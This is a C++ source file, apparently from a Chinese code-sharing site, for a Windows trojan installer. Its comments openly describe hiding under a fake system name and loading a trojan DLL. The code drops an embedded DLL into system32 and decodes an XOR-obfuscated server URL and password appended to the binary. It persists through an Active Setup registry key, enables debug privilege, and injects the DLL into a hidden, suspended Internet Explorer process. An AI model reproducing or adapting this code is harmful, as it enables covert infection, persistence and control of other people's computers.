📄 app.cpp
字号:
// App.cpp : Defines the entry point for the application.
/*
1--插入资源-图标文件
2--添加Script.rc文件到Resource Files
编译-----
一,使用release版而不用debug版编译
使用debug版编译会生成许多垃圾信息.我们先使用默认的设置进行一下编译.可以看到编译后
生成的文件有152k之巨.使用release版编译具体方法是:在"build(编译)--->Configuration(配置)"中
将"Win32 debug"移去,然后再次编译可以发现文件已经小了很多,才24k.但离我们的目标还很远呢.
二,设置自己的入口点函数
C或C++程序默认的入口函数是main()或WinMain(),但我们现在不用什么Main,WinMain.因为这些都不
是直接的入口点,编译器咱产生exe文件的时候,将为我们生成真正的入口点.下面我们来定义自己的入口函
数,具体是把main或WinMain改成其它的名字(如MyFun),打开"Project(工程)--->settings(设置)"选项,选
中"link"选项卡,在"Category(分类)"下拉列表中选"output",在" Entry-Point symbol(输入项-点符
号)"中输入我们刚才定义的入口函数(MyFun),在源程序中也要做相应修改,然后在编译.现在是16k了:)
三,优化最小大小
四,输出,入口点该为MyDll--随便改啦
五,连接,/align:40
*/
#include "stdafx.h"
//---------------------------------------------
#include "stdio.h"
#include <stdlib.h>
#include <tlhelp32.h>
#include "Resource.h"
#include "Tiny.h"
#define INIFILE "SystemUp.top"
#define SystemUp "SystemUp.dll"
BOOL InjectExplorer();
BOOL EnablePrivilege();
BOOL CreateInIFile();
char DllPath[MAX_PATH];
char URL[64] = {0};
char PW[16] = {0};
//DWORD WINAPI del(LPVOID lpParam);
ATOM MyRegisterClass(HINSTANCE hInstance);
/*
ATOM MyRegisterClass(HINSTANCE hInstance)
{
WNDCLASSEX wcex;
wcex.hIconSm = LoadIcon(wcex.hInstance, (LPCTSTR)IDI_SMALL);
return RegisterClassEx(&wcex);
}
*/
/*
BOOL GestDir()
{
TCHAR SysPath[MAX_PATH];
GetSystemDirectory(SysPath,MAX_PATH);
//执行自拷贝操作,把自身复制到系统目录下
lstrcat(SysPath,"\\");
lstrcat(SysPath,"SystemUp.dll");
CopyFile("C:\\SystemUp.dll",SysPath,FALSE);
return TRUE;
}
*/
BOOL CopySelfToSysdir()
{
//我们要隐藏在%SystemRoot%\system32\下虚假的程序名为exloroe.exe
const TCHAR* fakeExeName = "exloroe.exe";
TCHAR szDestFath[MAX_PATH];
TCHAR szTmp[MAX_PATH]={0};
// 获得后猛程序自身的全路径
if(!GetModuleFileName(NULL,szTmp,sizeof(szTmp)))
{
return FALSE;
}
//获取系统目录路径
if(!GetSystemDirectory(szDestFath,MAX_PATH))
{
return FALSE;
}
//得到目标全路径%SystemRoot%\system32\exloroe.exe
lstrcat(szDestFath,"\\");
lstrcat(szDestFath,fakeExeName);
//执行自拷贝操作,把自身复制到系统目录下
if(!CopyFile(szTmp,szDestFath,FALSE))
{
return FALSE;
}
return TRUE;
}
BOOL CreatServer()
{
HRSRC hResInfo;
HGLOBAL hResData;
DWORD dwSize,dwWritten;
HANDLE hFile;
char SystemPath[MAX_PATH] = {0};
GetSystemDirectory( SystemPath , MAX_PATH );
int len = strlen(SystemPath)-1;
if ( SystemPath[len] != '\\' )
strcat(SystemPath,"\\");
strcat(SystemPath,SystemUp);
//查询所需的资源
hResInfo = FindResource(NULL,MAKEINTRESOURCE(IDR_DLL),"Dll");
if(hResInfo == NULL)
{
MessageBox(NULL,"查询所需的资源","错误",MB_OK);
}
//获得资源尺寸
dwSize = SizeofResource(NULL,hResInfo);
//装载资源
hResData = LoadResource(NULL,hResInfo);
if(hResData == NULL)
return FALSE;
//写文件
hFile = CreateFile(SystemPath,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,NULL);
if(hResData == NULL)
return FALSE;
WriteFile(hFile,(LPCVOID)LockResource(hResData),dwSize,&dwWritten,NULL);
CloseHandle(hFile);
return TRUE;
}
/*
int EnableDebugPriv(const char * name)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
//打开进程令牌环
if(!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,
&hToken) )
{
printf("OpenProcessToken error.\n");
return 1;
}
//获得进程本地唯一ID
if(!LookupPrivilegeValue(NULL,name,&luid) )
{
printf("LookupPrivilege error!\n");
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
tp.Privileges[0].Luid = luid;
//调整权限
if(!AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL) )
{
printf("AdjustTokenPrivileges error!\n");
return 1;
}
return 0;
}*/
/*
BOOL InjectDll(const char *DllFullPath, const DWORD dwRemoteProcessId)
{
HANDLE hRemoteProcess;
if(EnableDebugPriv(SE_DEBUG_NAME))
{
printf("add privilege error");
return FALSE;
}
//打开远程线程
if( (hRemoteProcess = OpenProcess( PROCESS_CREATE_THREAD | //允许远程创建线程
PROCESS_VM_OPERATION | //允许远程VM操作
PROCESS_VM_WRITE,//允许远程VM写
FALSE, dwRemoteProcessId ) )== NULL )
{
printf("OpenProcess error!\n");
return FALSE;
}
char *pszLibFileRemote;
//使用VirtualAllocEx函数在远程进程的内存地址空间分配DLL文件名缓冲区
pszLibFileRemote = (char *) VirtualAllocEx( hRemoteProcess, NULL, lstrlen(DllFullPath)+1,
MEM_COMMIT, PAGE_READWRITE);
if(pszLibFileRemote == NULL)
{
printf("VirtualAllocEx error!\n");
return FALSE;
}
//使用WriteProcessMemory函数将DLL的路径名复制到远程进程的内存空间
if( WriteProcessMemory(hRemoteProcess,
pszLibFileRemote, (void *) DllFullPath, lstrlen(DllFullPath)+1, NULL) == 0)
{
printf("WriteProcessMemory error!\n");
return FALSE;
}
//计算LoadLibraryA的入口地址
PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryA");
if(pfnStartAddr == NULL)
{
printf("GetProcAddress error!\n");
return FALSE;
}
//OK,万事俱备,我们通过建立远程线程时的地址pfnStartAddr(实际上就是LoadLibraryA的入口地址)
//和传递的参数pszLibFileRemote(实际上是我们复制过去的木马DLL的全路径文件名)在远程进程内启动我们的木马DLL:
//启动远程线程LoadLibraryA,通过远程线程调用用户的DLL文件
HANDLE hRemoteThread;
if( (hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0,
pfnStartAddr, pszLibFileRemote, 0, NULL) ) == NULL)
{
printf("CreateRemoteThread error!\n");
return FALSE;
}
return TRUE;
}
*/
/*unsigned long getprocid(char *pn)
{
BOOL b;
HANDLE hnd;
PROCESSENTRY32 pe;
hnd=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
pe.dwSize=sizeof(pe);
b=Process32First(hnd,&pe);
while(b)
{
if(strcmp(pn,pe.szExeFile)==0)return pe.th32ProcessID;
b=Process32Next(hnd,&pe);
}
return 0;
}
*/
void jiemistr(char *a)
{
int i;
for(i=0;i<500;i++)
a[i]=a[i]^1116;
}
typedef struct IniInfor
{
char httpsrc[64];
char pawssword[16];
}IniInfor;
BOOL CreateInIFile()
{
FILE *fp;
char *m[6];
char svBuffer[128],strtmp[500];
char *p;
int i = 0;
char *mySelf=new char[256];
IniInfor Ini = {0};
GetModuleFileName(NULL,mySelf,256);
memset(svBuffer,0,128);
if((fp = fopen(mySelf,"r")) == NULL)
return 0;
fseek(fp, -128, SEEK_END);
fread(svBuffer, sizeof(char), 128, fp);
fclose(fp);
if(memcmp(svBuffer,"configserver",12)==0)
{
strncpy(svBuffer,svBuffer+12,strlen(svBuffer)-12);
strncpy(strtmp,svBuffer,104);
jiemistr(strtmp);
p = strtok (strtmp,"$");
while(p)
{
m[i]=p;
if(p = strtok (NULL,"$"))
i++;
if(i==6) break;
}
}
else return 0;
free(svBuffer);
memset( URL, 0, strlen(URL));
strcpy( URL, m[0]);
strcpy( PW, m[1]);
memcpy(Ini.httpsrc,URL,strlen(URL));
memcpy(Ini.pawssword,PW,strlen(PW));
char SystemPath[MAX_PATH] = {0};
GetSystemDirectory( SystemPath , MAX_PATH );
int len = strlen(SystemPath)-1;
if ( SystemPath[len] != '\\' )
strcat(SystemPath,"\\");
strcat(SystemPath,INIFILE);
FILE* fop = fopen ( SystemPath , "w" );
if ( fop == NULL )
{
printf("\nCreate Inifile false");
return 0;
}
fwrite(&Ini,sizeof(Ini),1,fop);
fclose(fop);
return 1;
}
//---------------------------------------------------------
int APIENTRY MyApp(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// TODO: Place code here.
//---------------------------------------
// MyRegisterClass(hInstance);
// CreateThread(NULL,NULL,del,NULL,NULL,NULL);
//使用挂起模式启动ie
PROCESS_INFORMATION pi = {0};
STARTUPINFO si = {0};
//-------隐藏启动
ZeroMemory(&si,sizeof(si));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
pi.hProcess = SW_HIDE;
//------
CreateProcess(
NULL,
"C:\\Program Files\\Internet Explorer\\iexplore.exe",
NULL,
NULL,
0,
CREATE_SUSPENDED,
NULL,
NULL,
&si,
&pi
);
//WinExec("C:\\Program Files\\Internet Explorer\\iexplore.exe -nohome",SW_HIDE);
CreateInIFile();
HKEY hKey;
TCHAR svExeFile[256] = "%SystemRoot%\\system32\\exloroe.exe";
RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}",&hKey);
RegSetValue(hKey,NULL,REG_SZ,"系统设置",strlen("系统设置"));
RegSetValueEx(hKey,"stubpath",0,REG_EXPAND_SZ,(BYTE *)svExeFile,lstrlen(svExeFile));
RegCloseKey(hKey);
CreatServer();
//GestDir();
EnablePrivilege();
InjectExplorer();
/* if ( !EnablePrivilege() )
MessageBox(NULL,"提升权限错误","错误",MB_OK);
if ( InjectExplorer() )
MessageBox(NULL,"程序已经启动","很好",MB_OK);*/
/* DWORD procid;
procid=getprocid("explorer.EXE");/*得到进程PID*/
/*
if(procid==0)
return 1;
if( InjectDll("SystemUp.dll",procid) )
{
printf("Inject OK!\n");
}
else
{
printf("Inject Fail!\n");
}*/
CopySelfToSysdir();
//DeleteFile("C:\\SystemUp.dll");
//WinExec("exloroe.exe",SW_HIDE);
//---------------------------------------
return 0;
}
/*
DWORD WINAPI del(LPVOID lpParam)
{
RegDeleteKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Active Setup\\Installed Components\\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}");
return TRUE;
}
*/
BOOL InjectExplorer()
{
HANDLE hSnapshot;
DWORD dwProcessId=0;
PROCESSENTRY32 process32 = { 0 };
hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if(hSnapshot == NULL)
{
printf("CreateToolHelp32Snapshot failed.");
return FALSE;
}
process32.dwSize = sizeof (process32);
BOOL ret = Process32First(hSnapshot,&process32);
while ( ret )
{
if ( !strnicmp( "iexplore.EXE", process32.szExeFile , strlen(process32.szExeFile)) )
{
dwProcessId = process32.th32ProcessID;
// printf("\n%d %s",pID,process32.szExeFile);
break;
}
ret = Process32Next(hSnapshot,&process32);
}
CloseHandle(hSnapshot);
if ( ret == FALSE )
return FALSE;
/////////////////////////////////////////////////////
char* pszLibFile = "SystemUp.dll";
HANDLE hProcess = NULL;
HANDLE hThread = NULL;
LPTSTR pszLibFileRemote = NULL;
hProcess = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION |PROCESS_VM_WRITE, FALSE, dwProcessId);
if(hProcess == NULL)
{
fprintf(stderr, "OpenProcess failed. --err: %d\n", GetLastError());
return FALSE;
}
int cch = 1 + lstrlen(pszLibFile);
int cb = cch * sizeof(TCHAR);
pszLibFileRemote = (PTSTR)VirtualAllocEx(hProcess, NULL, cb, MEM_COMMIT, PAGE_READWRITE);
if(pszLibFileRemote == NULL)
{
fprintf(stderr, "VirtualAllocEx() failed. --err: %d\n", GetLastError());
return FALSE;
}
if(!WriteProcessMemory(hProcess, pszLibFileRemote, (PVOID)pszLibFile, cb, NULL))
{
fprintf(stderr, "WriteProcessMemory() failed. --err: %d\n", GetLastError());
return FALSE;
}
PTHREAD_START_ROUTINE pfnThreadRtn = (PTHREAD_START_ROUTINE)
GetProcAddress(GetModuleHandle("Kernel32"), "LoadLibraryA");
if(pfnThreadRtn == NULL)
{
fprintf(stderr, "GetProcAddress() failed. --err: %d\n", GetLastError());
return FALSE;
}
hThread = CreateRemoteThread(hProcess, NULL, 0, pfnThreadRtn, pszLibFileRemote, 0, NULL);
if(hThread == NULL)
{
fprintf(stderr, "CreateRemoteThread() failed. --err: %d\n", GetLastError());
return FALSE;
}
//WaitForSingleObject(hThread, INFINITE);
//VirtualFreeEx(hProcess, pszLibFileRemote, 0, MEM_RELEASE);
//CloseHandle(hThread);
//CloseHandle(hProcess);
//CreateThread(NULL,NULL,del,NULL,NULL,NULL);
return TRUE;
}
BOOL EnablePrivilege()
{
HANDLE hProcessToken = NULL;
if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hProcessToken))
{
printf("OpenProcessToken() failed. --err: %d\n", GetLastError());
return FALSE;
}
TOKEN_PRIVILEGES tp={0};
LUID luid={0};
if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&luid))
{
printf("LookupPrivilegeValue error:%d", GetLastError() );
return FALSE;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
// Enable the privilege
AdjustTokenPrivileges(hProcessToken,FALSE,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL);
if(GetLastError() != ERROR_SUCCESS)
{
return FALSE;
}
return TRUE;
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -